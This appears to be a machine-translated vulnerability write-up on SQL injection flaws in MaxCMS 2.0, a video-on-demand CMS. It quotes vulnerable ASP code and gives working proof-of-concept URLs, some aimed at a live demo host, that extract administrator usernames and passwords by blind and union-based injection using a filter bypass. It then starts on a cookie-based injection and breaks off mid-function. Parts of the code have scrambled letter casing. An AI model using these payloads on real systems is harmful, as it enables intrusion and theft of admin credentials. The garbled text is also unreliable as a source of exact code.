This system is a very popular on-demand Video-on-Demand System in China. The previous version 1.5 has many vulnerabilities. Version 2.0 has improved its security, but there are still vulnerabilities. Check the Code \ inc \ ajax. aspdimaction: actiongetForm (action, get) response. CharsetgbkSelectcaseactioncasenewslist: viewNewsLi
This system is a very popular on-demand Video-on-Demand System in China. The previous version 1.5 has many vulnerabilities. Version 2.0 has improved its security, but there are still vulnerabilities.
View code
INcAjax. asp
- Dim action: action = getFoRm("Action", "get ")
- Response. CharSet= "Gbk"
-
- SelectCase action
- Case "newslist": viewNewsList
- Case "newscontent": viewNewsContent
- Case "digg ","TrEad ": scoreVIdEo (action)
- Case "reporterr": reportErr
- Case "hit": upDateHit
- Case eLsE: main
- End Select
- TerminateAllObjects
-
- ......
-
- SubScoreVideo (operType)
- Dim SQL, id, digg, returnValue: id = getForm ("id", "get ")
- \ 'Get the id value through get
- If rCookie ("maxcms2_score" & id) = "OK" then die "havescore"
- If isNul (id) then die "err"
- \ 'On error reSuMe nExT
- Digg = conn. db ("select m_digg from {pre} data where m_id =" & id, "exeCutE ") (0)
- \ 'Parameter id, which is included in the SQL statement for query without Filtering
- If err then digg = 0: err.Clear()
- If not isNum (id) then echoSaveStr "safe" else id = cLnG (id)
- \ 'Digg is queried. Pay attention to the returned content.
- ......
It is easy to use. Construct an SQL statement for submission (the default structure is m_manager, m_username, m _Pwd), Which can be determined based on the returned content.
If the constructed statement is correct, a message similar to warning that the data you submitted has invalid characters is returned. your IP address xxxx has been recorded and operated.
If the constructed statement is incorrect, 500 is returned.
Poc:
Correct:
- http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
Incorrect:
- http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99
In fact, just find an injection tool and run it.
I used to briefly read this system. The specific code is not recorded, so I will leave two injection statements. Maybe the injection is no longer there.
This vulnerability is really mentally retarded. Because the keyword is used for SQL detection and filtering, but many important keywords are followed by spaces, so that we can use the () method to replace spaces to bypass the problem.
- http://localhost/play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])
- http://localhost/play.asp?id=-999+union(select(adminname),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])
Another injection
- Sub checkPower
- dim loginValidate,rsObj : loginValidate = "maxcms2.0"
- err.clear
- on error resume next
- set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=\'"&rCookie("m_username")&"\'","execute")
- loginValidate = md5(getAgent&getIp&rsObj(0))
- if err then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》"
- if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》"
- checkManagerLevel rsObj(1)
- set rsObj=nothing
- End Sub
Where
- Function rCookie(cookieName)